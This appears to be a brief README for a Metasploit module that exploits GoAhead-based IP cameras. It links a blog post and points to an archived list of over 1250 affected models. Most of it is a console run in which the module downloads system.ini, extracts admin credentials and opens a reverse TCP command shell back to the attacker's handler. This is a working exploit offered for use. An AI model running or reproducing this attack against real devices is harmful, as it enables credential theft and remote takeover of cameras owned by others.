More explanations can be found [in this blog post]( https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html)

1250+ models have been found so far. The complete list has been removed from the post but can be found on older version scrapped by internet archive / wayback machine.

steps :
```
`msf exploit(ipcam_rce_with_creds_leak) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
msf exploit(ipcam_rce_with_creds_leak) > run

[*] Started reverse TCP handler on 192.168.1.1:4444 
[*] Trying to download system.ini
[*] 192.168.1.66:80 - Credentials saved in: /root/.msf4/loot/20170502164315_default_192.168.1.66_system.ini_061595.ini
[*] Trying to extract credentials
[+] Found 1 possible credentials
[+] login : admin / password : test
[!] No active DB -- Credential data will not be saved!
[*] Trying to trigger code execution with credentials : login : admin / password : test
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.66:56527) at 2017-05-02 16:43:16 -0400`
```